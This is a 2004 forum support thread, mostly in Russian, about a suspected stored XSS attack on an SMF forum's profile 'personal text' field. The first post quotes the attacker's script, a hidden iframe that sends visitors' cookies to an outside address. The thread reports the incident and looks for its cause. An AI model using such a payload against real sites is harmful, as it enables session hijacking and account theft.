Advertisement:

Author Topic: personalText: XSS  (Read 6778 times)

Offline Toomany

  • Semi-Newbie
  • *
  • Posts: 52
  • Gender: Male
  • Hithion a.k.a. Toomany.
    • hithion : homepage
personalText: XSS
« on: December 10, 2004, 02:20:27 AM »
Буквально этой ночью на моём форуме (RC2) один безвестный нехорошийчеловек каким-то образом умудрился внедрить в personalText своего профиля вредоносный javascript.
Выглядела его подпись при просмотре HTML примерно так:
Code: [Select]
<script src=адрес скриптa></script>Скрипт в свою очередь выглядел так:
Code: [Select]
var a='<iframe src=http://адрес/?co=' + document.cookie + ' width=0 height=0 style=visibility:hidden></iframe>';document.write(a);
Причем! По идее, при обработке полей профиля < и > должны меняться на соответствующие литералы &lt; и &gt;. Более того, менялись - если я заходил в этого человека и пересохранял его - теги убивались, меняясь на литералы.

Внимание, вопрос знатокам! :)
КАК этот нехороший человек ухитрился засадить в personalText этот самый жаба-скрипт? :)
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..

Offline [Unknown]

  • SMF Friend
  • SMF Master
  • *
  • Posts: 36,102
  • Gender: Male
Re: personalText: XSS
« Reply #1 on: December 10, 2004, 03:39:31 AM »
I can't read Russian, but you can't put any javascript into your personal text, unless you've changed something.

Try putting <b>test</b> in there.  If you're right, your personal text will be bold.

Now, of course, if you have database access you can manually edit the field, and get the effect I assume you describe.  For this reason, we suggest you do not give your users phpMyAdmin or MySQL server access.

If you're saying that someone did this to you, I will need you to send me Apache access logs from the time it happened, if possible.

-[Unknown]
« Last Edit: December 10, 2004, 03:41:43 AM by [Unknown] »

Offline Toomany

  • Semi-Newbie
  • *
  • Posts: 52
  • Gender: Male
  • Hithion a.k.a. Toomany.
    • hithion : homepage
Re: personalText: XSS
« Reply #2 on: December 10, 2004, 03:53:15 AM »
U can't read Russian, I can't write in English... That's cruel fate =(

Briefly:
Someone has successfully embedded malicious javascript into his personal text at my SMF 1.0RC2.
And hell if I know, how it has bypassed a "</>" filtration - I could not reproduce it.

Now personal t0ext strip_tags()'ed :) before output - for a while.
« Last Edit: December 10, 2004, 03:57:54 AM by Toomany »
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..